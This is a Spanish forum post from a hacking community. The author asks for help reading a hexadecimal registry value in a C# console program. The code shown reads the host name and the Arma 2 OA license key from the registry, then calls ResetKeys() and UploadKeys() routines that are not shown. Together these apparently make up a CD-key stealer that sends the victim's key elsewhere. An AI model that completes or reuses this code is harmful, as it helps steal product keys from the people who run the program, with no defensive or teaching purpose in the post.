elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


  Mostrar Temas
Páginas: [1]
1  Programación / .NET (C#, VB.NET, ASP) / C# Coger valor de un Regsitro Hexadecimal en: 9 Noviembre 2012, 16:23 pm
Hola y muy buenas!

Soy nuevo en esto de la programacion pero ya llevo algun tiempo leyendo y haciendo pruebas por mi parte, pero ahora que ya se algo sobre C# me he propuesto hacer un programa en Consola. El programa basicamente lo que hace es que coge el valor de una key del registro.
En principio todo el codigo esta bien programado, el problema radica en que el valor que yo quiero coger es un valor hexadecimal y no se como hacer especificamente eso.
Para que me entiendan mejor les dejo el fragmento del codigo que se encarga de coger el valor del registro:

        static void Main(string[] args)
        {
            keys = keys + "PC Name - " + Dns.GetHostName() + "\n";
            GetKeys();
            ResetKeys();
            UploadKeys();
        }

        static void GetKeys()
        {
            RegistryKey RegKey;
            RegKey = Registry.LocalMachine.OpenSubKey("software\\wow6432node\\bohemia interactive studio\\arma 2 oa", true);
            if (RegKey == null) // does registry exist
            {
                keys = keys + "Arma 2 OA not installed\n";
            }
            else
            {
                keys = keys + "Arma 2 OA - " + RegKey.GetValue("key"); //aqui es donde esta el problema
            }
        }

Espero que me puedan ayudar.

Muchas gracias de antemano, un saludo. Jacablaca
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines